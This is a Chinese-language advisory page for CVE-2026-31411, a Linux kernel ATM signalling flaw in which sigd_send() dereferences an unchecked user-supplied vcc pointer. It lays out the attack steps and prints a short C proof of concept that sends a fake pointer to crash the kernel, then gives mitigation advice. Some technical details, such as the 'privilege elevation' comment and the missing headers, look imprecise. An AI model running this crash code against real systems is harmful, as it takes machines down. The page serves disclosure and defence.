CVE-2026-31411 CVSS 5.5 中危

CVE-2026-31411: Linux内核ATM模块指针验证缺失漏洞

披露日期: 2026-04-08

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31411

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核的网络ATM模块存在安全漏洞，源于sigd_send()函数未对用户空间传入的vcc指针进行验证。攻击者可利用ATMSIGD_CTRL接口伪造指针地址，导致内核解引用非法地址引发系统崩溃。

技术细节

该漏洞发生在Linux内核ATM子系统的信令处理路径中。内核在处理来自用户空间（伪装成信令守护进程）的消息时，直接使用了msg->vcc指针而未校验其是否存在于vcc_hash哈希表中。攻击者首先通过socket创建AF_ATMSVC套接字，并利用ioctl(fd, ATMSIGD_CTRL)获取特权。随后构造包含恶意指针（如0xdeadbeef）的msghdr结构体，调用sendmsg发送。内核在sigd_send()中直接解引用该指针，导致内核恐慌。修复补丁引入了find_get_vcc()函数，通过哈希表查找和引用计数确保指针有效性。

攻击链分析

STEP 1

步骤1：创建套接字

攻击者调用socket()创建AF_ATMSVC类型的套接字。

STEP 2

步骤2：获取信令守护进程权限

使用ioctl(fd, ATMSIGD_CTRL)将进程标识为ATM信令守护进程，赋予其向内核发送特定信号的权限。

STEP 3

步骤3：构造恶意消息

准备msghdr结构体，在缓冲区偏移处写入一个伪造的内核地址（如0xdeadbeef）作为vcc指针。

STEP 4

步骤4：触发漏洞

调用sendmsg()将恶意消息发送给内核，内核在sigd_send()中解引用该伪造指针。

STEP 5

步骤5：系统崩溃

由于地址无效，内核发生空指针解引用或非法访问错误，导致系统崩溃（DoS）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <sys/socket.h>
#include <sys/ioctl.h>

// PoC for CVE-2026-31411
// Triggers a kernel crash by sending a fake vcc pointer.

int main() {
    int fd = socket(AF_ATMSVC, SOCK_DGRAM, 0);
    // Elevate privileges to act as ATM signaling daemon
    ioctl(fd, ATMSIGD_CTRL);

    struct iovec iov;
    struct msghdr msg = {0};
    char buf[128] = {0};

    // Inject a fake pointer (e.g., 0xdeadbeef)
    *(unsigned long *)(buf + 4) = 0xdeadbeef;

    iov.iov_base = buf;
    iov.iov_len = sizeof(buf);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;

    // Kernel dereferences the fake pointer here
    sendmsg(fd, &msg, 0);

    return 0;
}

影响范围

Linux Kernel < 6.8 (需根据具体补丁提交确认)

Linux Kernel 稳定版分支 (v6.6, v6.1等受影响版本)

防御指南

临时缓解措施

建议系统管理员立即更新内核以修复此漏洞。对于无法立即更新的系统，应禁用ATM模块或严格限制能够访问ATM套接字的用户权限，防止攻击者利用ATMSIGD_CTRL接口。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表